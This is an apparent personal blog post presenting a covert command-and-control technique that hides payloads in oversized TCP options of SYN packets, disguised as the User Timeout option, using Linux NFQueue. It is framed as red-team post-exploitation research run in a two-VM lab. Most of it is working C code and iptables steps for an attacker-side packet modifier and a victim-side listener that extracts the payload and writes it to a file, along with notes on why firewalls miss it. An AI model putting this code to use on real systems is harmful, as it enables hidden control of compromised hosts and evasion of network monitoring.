Command and Control via TCP Handshake

Quick Intro/Disclaimer

This is my first blog post, so please let me know if there’s any way I can improve this post. I expect it to have inaccuracies and maybe have parts that can be explained better. Would appreciate a quick note if any of you notice them! So, all that BS aside, let’s get into it.

 
Quick disclaimer: the method presented here probably doesn’t have as much use or application in a real red teaming scenario. The main reason: you need to have root on the victim machine at some point for it to even work, although after having it one time you can configure the victim system so it is not necessary again. I wrote this as primarily because I though it was a cool and creative way to exfiltrate or infiltrate data with hilarious stealth.  

Background

Command and control is pretty widely known across the security world. You set up a listener on a victim machine and send commands to it that it then executes, hopefully with root. People have a lot of creative ways to hide the commands that are sent: Cobalt Strike uses timed delays with its beacons, Wireguard can be used to encrypt data while being transferred, etc. However, the problem with all these approaches is that anyone (or anything) that’s monitoring data transfer at the right time and place has the potential to catch these threats. However, who the hell looks so closely at SYN packets? 



Initial Info

If you know the structure of an IPV4 or TCP packet or are OK with checking back to see what part of the packet I’m talking about, skip ahead.

IPV4 packets are structured as shown in this image

"IPV4 Packet Structure"

TCP packets are structured as shown in this image.

"TCP Packet Structure"



Not much space to hide any data. That makes perfect sense because handshake packets are meant to establish a connection and define parameters for it, not send data themselves. Much of the packet is pre-defined or will cause problems with the connection if changed, like port, flags, etc. The sequence number can encode 4 bytes of data at a time to infiltrate data, but this isn’t good enough. 4 bytes per second might be acceptable for RCE to a server on the Moon in 1969 but we need something that can at least carry the equivalent of a full sentence in English. Meet: the options field.

TCP Options are absolutely vital in modern day connections. They are what define how data will be transferred from one endpoint to the other. The entire size of a TCP handshake must be at maximum 60 bytes. Thus, there’s a whopping 40 bytes of space available in TCP options. Ten times more than what we just saw! We will actually able to go beyond this in the test environment and the packet will still be accepted. Through research online, I found that the 40 bytes limit is for packets that need to be legit. In practice, an extra long TCP options portion will only be truncated if the packet is re-segmented when it goes through one of its hops. The firewall will (I assume) need to have this 20 byte limit hardcoded and ignore the total length portion of the IPV4 header to truncate all the values.

However, for the purpose of this experiment we are gonna assume that doesn’t happen and the packet is sent through as it is. In order to add options to the TCP packet, we need to update the “Data Offset” portion which lists the number of 32 bit words in the packet. The TCP packet is 5 words (20 bytes / 32 bits or 4 bytes = 5) and the Data Offset portion is 2 bits, leaving us 251 words to work with: a THICC 1KB of data that could go in the options. More than enough for a couple of commands.

In addition, although we won’t mess with this in the experimental setup, there is an experimental option that IANA has acknowledged that lets you extend the Data Offset portion by even more. Here’s a link for those that want to read more into it.

NFQueue

Netfilter created a plugin called NFQueue for IPtables to bridge the gap between intercepting packets on the kernel and being able to modify and read them from your own program from userspace. It relies on the libnetfilter_queue library and (initially) root access which sucks, but it won’t stop us. For now, everything will be done through root, but for future work any user with CAP_NET_ADMIN capabilities on the victim can perform this attack as well.

Back to the topic at hand, NFQueue copies packets from kernel space to userspace for anyone with privileges to mess with them then give a verdict. This verdict could be your everyday ACCEPT, REJECT, DROP, or one of the special NF_REPEAT or NF_QUEUE which either reinserts the modified packet back into the queue or sends it to a different NFQueue listener.

Enough talk. Time to code.

Building the test environment

The test environment I setup is two Ubuntu 18.04 LTS server VMs each with libnetfilter-queue-dev dependencies installed where I refer to one as the listener, the victim machine, and the controller, the attacking machine.

Writing the code

I will be going over how the code actually works. If you just wanna see Wireshark pictures and the result, skip ahead to the screenshots.

Some stupid college kid boiled some plates

NFQueue needs a big chunk of boilerplate code to get started. Noone wants to write all that code themselves, so neither will we. The boilerplate I have made for us is a heavily modified version of the Hello World found here.

Initial commit for the controller can be found here

Initial commit for the listener can be found here

Breaking down the boilerplate

Lots of code here, let’s go over it real quick.


tcp_pkt_struct.h

1
2
3
4
5
6
7
#pragma pack(push, 1)
typedef struct {
struct iphdr ipv4_header;
struct tcphdr tcp_header;
} full_tcp_pkt_t;
#pragma pack(pop)

This is what we will use to modify packet headers. NFqueue just gives us a void array of bytes, it’s up to us to figure out what to do with. Notice struct iphdr and struct tcphdr are directly from the Linux networking library.

main.c

We will treat three functions as a black box (we know what they do but not how they do it). Mostly because I found them on Google and actually have no idea how they work.

1
2
3
long ipcsum(unsigned char *buf, int length);
void tcpsum(struct iphdr *pIph, unsigned short *ipPayload);
void rev( void *start, int size);

ipcsum and tcpsum calculate the checksum of an IPV4 and TCP packet. rev reverses the bytes starting at the passed in pointer for size number of bytes. so 01 02 03 will become 03 02 01. We will use this to fight the battle against different endians for network byte order and Linux byte order.

Now let’s look at the non-blackbox functions.

1
2
3
int main();
static int cb(struct nfq_q_handle *qh, struct nfgenmsg *nfmsg, struct nfq_data *nfa, ...);
static void modify_handshk_pkt(full_tcp_pkt_t *pkt, int pkt_len);

The main functions loads packets from the sk_buff and writes them into a statically allocated 4098 byte buffer. 4098 is overkill for SYN packets. Change it if you want. You don’t have to for experimental purposes.

The cb is the callback that handles each packet as it enters sk_buff and modify_handshk_pkt will modify or read the packet as needed.


Plan of attack

Let’s take a look at a SYN packet in Wireshark to see what we are working with. I ran a simple web server on port 8000 on the listener

1
python3 -m http.server &

Curl the server from the controller

Let’s look at what wireshark shows (filtered for just SYN packets)


Analysis


The portion that is highlighted in white, `02 04 05 b4` is where the TCP options start. TCP options are placed one after another in the format "Option-Kind: 1 byte - Option-Length: 1 byte - Option-value: value of length - 2 bytes". The option length defines the length for ALL bytes in the option, including the byte used for the kind and length itself. In this case, `02` represents the Maximum Segment Size, has a length of `04`, and a value of `05b4`.

Notice Header Length: 40 bytes further up in Wireshark’s description of the packet. This is a converted form of the Data Offset field.

So in order to add options at the end, we will need to update the Total Length in the IPV4 packet (look back if you don’t remember) and the Data Offset with as many 4 bit words as are in our options. This also means that the total length of everything we add to the packet has to be a multiple of 4 (you can’t have a fractional Data Offset). We can pad the packet with 01 or No-OP for this purpose.


The Storm of Code - Controller

The legit way to add extra data to the TCP packet would be to use an experimental option. However, we want to hide, so let’s use an option that will be very common, like User Timeout (0x1c or 28). IANA has a list of option assignments on their page.

So let’s add to the code.


tcp_pkt_struct.h

Insert code at the top

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#define METADATA_SIZE 16

#pragma pack(push, 1)
typedef struct {
uint16_t padding;
uint8_t opt;
uint8_t len;
uint32_t payload;
uint32_t payload_2;
uint32_t payload_3;

} pkt_meta;

#pragma pack(pop)

...

The option has a kind, a length, and a payload which is a string we will write to a file on the victim. The padding at the beginning is to keep the total length divisible by 4. Because the data will directly be appended to the packet, we cannot use an array and need to split the payload into chunks of 4 bytes.


main.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static void modify_handshk_pkt(full_tcp_pkt_t *pkt, int pkt_len) {

/* Should match only SYN packets */
printf("\nPacket intercepted: \n");
if (pkt->tcp_header.syn == 1 && pkt->tcp_header.ack == 0) {
printf("\tPacket type: SYN\n");
pkt_meta *metadata = (pkt_meta *)((unsigned char *)pkt + pkt_len);
metadata->padding = 0x0101;
metadata->opt = 0x1c; // Custom option kind. 28 = User Timeout
metadata->len = METADATA_SIZE - sizeof(metadata->padding); // Custom option length. Default length of User timeout is different.
pkt->tcp_header.doff += METADATA_SIZE / 4; // Change data offset

}




}

We added in all the code relevant to the TCP packet. At the end, we change the data offset to reflect the additional options. Let’s move onto the callback where the packet is finally sent on its way.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
static int cb(struct nfq_q_handle *qh, struct nfgenmsg *nfmsg, struct nfq_data *nfa, void *data) {
u_int32_t id;

struct nfqnl_msg_packet_hdr *ph;
ph = nfq_get_msg_packet_hdr(nfa);
id = ntohl(ph->packet_id);
printf("entering callback\n");

full_tcp_pkt_t *ipv4_payload = NULL;
int pkt_len = nfq_get_payload(nfa, (unsigned char **) &ipv4_payload);
modify_handshk_pkt(ipv4_payload, pkt_len);

rev(&ipv4_payload->ipv4_header.tot_len, 2);
ipv4_payload->ipv4_header.tot_len += METADATA_SIZE;
rev(&ipv4_payload->ipv4_header.tot_len, 2);

ipv4_payload->ipv4_header.check = 0;
ipv4_payload->ipv4_header.check =
ipcsum((unsigned char *)&ipv4_payload->ipv4_header,
20);
rev(&ipv4_payload->ipv4_header.check, 2); // Convert between endians

tcpcsum(&ipv4_payload->ipv4_header,
(unsigned short *)&ipv4_payload->tcp_header);
int ret = nfq_set_verdict(qh, id, NF_ACCEPT, (u_int32_t) pkt_len + METADATA_SIZE,
(void *) ipv4_payload);
printf("\n Set verdict status: %s\n", strerror(errno));
return ret;
}

We extend the total length of the IPv4 packet so the TCP packet doesn’t get truncated on its way to the destination. The Linux system I was using got confused between it’s preferred Little Endian and the network packet’s Big Endian, so I had to reverse the bytes first, add the length, and reverse the bytes again. This may not be the case for you guys. You can confirm it by seeing if the total length increases by 0x0010 bytes or by 0x1000 bytes. We then recalculate the IP and TCP checksum while reversing the bits as necessary. (Normally packets don’t need a valid TCP checksum but let’s put it there anyways).


Fruit of labour


Let’s see the result of our work. Make a build folder and build the entire project using CMake. Then upload to the controller. There’s an IPtables rule in iptables_rules.sh that intercepts SYN packets on port 8000 and sends them to queue 0. If nothing is listening on queue 0 then it simply sends the SYN on its way.

Steps

  1. Create build folder and build project
  2. Upload build folder and iptables_rules.sh file to controller.
  3. Run iptables_rules.sh as root on controller (only if the system was restarted or this is the first upload)
  4. Run main in the build folder as root on controller
  5. Start up Wireshark on listener filtering on packets on port 8000 to view the result (to make sure it was received)
  6. Send HTTP request from controller to listener on port 8000

Controller Screenshot

Controller Wireshark

Awesome! The SYN packet in that whole HTTP request has our data added to the end. No kernel programming necessary. Notice that the User timeout is supposed to be 4 bytes and we set it to 14. If you want to be extra stealthy you can use multiple options and break your payload into their individual default lengths so there isn’t an anomaly. For this experiment, we don’t care. :P

The Storm of Code- listener

Cool we modified a packet from the controller. Big whoop. But now we have to do something with that payload.

The code in the listener is the exact same for the boilerplate and tcp_pkt_struct.h so refer back if you forgot about them. Let’s go right into main.c.

main.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
int write_to_file(unsigned char *payload, int len){
int output_fd;
ssize_t ret_out;

output_fd = open("virusfile.pup", O_WRONLY | O_CREAT, 0644);
if(output_fd == -1){
perror("open virus file");
return 3;
}
ret_out = write(output_fd, payload, len);
close(output_fd);
return 0;
}

static void modify_handshk_pkt(full_tcp_pkt_t *pkt, int pkt_len) {

/* Should match only SYN packets */
printf("\nPacket intercepted: \n");
if (pkt->tcp_header.syn == 1 && pkt->tcp_header.ack == 0) {
printf("\tPacket type: SYN\n");
pkt_meta *metadata = (pkt_meta *)((unsigned char *)pkt + pkt_len - METADATA_SIZE);
unsigned char *payload = (unsigned char *)(&metadata->payload);
write_to_file(payload, METADATA_SIZE - (sizeof(metadata->padding) + sizeof(metadata->opt) + sizeof(metadata->len)));
printf("RECEIVED PAYLOAD: %s", payload);
pkt->tcp_header.doff -= METADATA_SIZE / 4;
}


}

We basically do the opposite of what we did in the controller when reading the packet. The pointer for the metadata has to be after the original size of the packet, and instead of writing to the metadata we read from it. Then, we write the payload to a file and reduce the Data Offset back to the initial value.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
static int cb(struct nfq_q_handle *qh, struct nfgenmsg *nfmsg, struct nfq_data *nfa, void *data) {
u_int32_t id;

struct nfqnl_msg_packet_hdr *ph;
ph = nfq_get_msg_packet_hdr(nfa);
id = ntohl(ph->packet_id);
printf("entering callback\n");

full_tcp_pkt_t *ipv4_payload = NULL;
int pkt_len = nfq_get_payload(nfa, (unsigned char **) &ipv4_payload);
modify_handshk_pkt(ipv4_payload, pkt_len);
rev(&ipv4_payload->ipv4_header.tot_len, 2);
ipv4_payload->ipv4_header.tot_len -= METADATA_SIZE;
rev(&ipv4_payload->ipv4_header.tot_len, 2);

ipv4_payload->ipv4_header.check = 0;
ipv4_payload->ipv4_header.check =
ipcsum((unsigned char *)&ipv4_payload->ipv4_header,
20);
rev(&ipv4_payload->ipv4_header.check, 2); // Convert between endians

tcpcsum(&ipv4_payload->ipv4_header,
(unsigned short *)&ipv4_payload->tcp_header);

int ret = nfq_set_verdict(qh, id, NF_ACCEPT, (u_int32_t) pkt_len - METADATA_SIZE,
(void *) ipv4_payload);
printf("\n Set verdict status: %s\n", strerror(errno));
return ret;
}

Again, just reversing what we did earlier by reducing total length, recalculating checksum, and truncating packet bytes sent out by libnetfilter_queue library.


Proving it worked

Let’s look at some screenshots to see that it worked.

Steps to build:

  1. Build the project like shown in controller
  2. Note that iptables_rules.sh captures on PREROUTING and not POSTROUTING to intercept packets coming into the system. Upload and run iptables scripts as shown in controller.
  3. Use iptables_clean.sh if you mess up (note that it flushes a ton of rules because I’m lazy) or remove the rule manually and try again.
  4. Run the server executable in build directory on the listener

Listener packet interception

Cool! We intercepted the SYN packet coming in, and received the payload. Let’s make sure we could write it to a file (you can do anything you want with the payload once you have it).


Listener file contents

And there you go. Payload was intercepted, packet was truncated (although I couldn’t find a screenshot to prove that, you can see for yourself if you run it), and noone is the wiser. The firewall doesn’t have the resources to read the options of every single SYN packet coming in, especially when it’s a large scale environment with lots of inbounds connections, and the endpoint is none the wiser.

Conclusions

This is just a Hello World example of what can be done with NFQueue from a red teaming perspective during post-exploitation. The easiest way to hide something in network traffic is to hide in numbers, and we have done just that. There isn’t anything more common than an incoming SYN packet to a server.

However, this method does require root privileges on the victim system or CAP_NET_ADMIN capabilities for a compromised user. Additionally, the libnetfilter_queue dependency must be installed on the victim, meaning that for now this method will only work on systems with netfilter and the NFQueue extension installed (so far I could only find it working on Linux). It can also work on BSD systems using divert sockets but I have not tried that, although as per documentation there are similar limitations as to the Linux method.

I plan to find a way to hide the payload better within TCP options by researching more into default lengths and commonly used option kinds. Additionally, I’m trying to construct an environment where the TCP packet is re-segmented and possibly truncated if the handshake packet is more than 60 bytes.

Future learning

This is my first time making a blog post. Please contact me at thesw4rm@pm.me if you want to discuss anything tech based with me. Definitely please let me know of anything that can be improved, if this method is actually applicable in a real engagement, or anyway I can improve it so it becomes that way. Peace guys!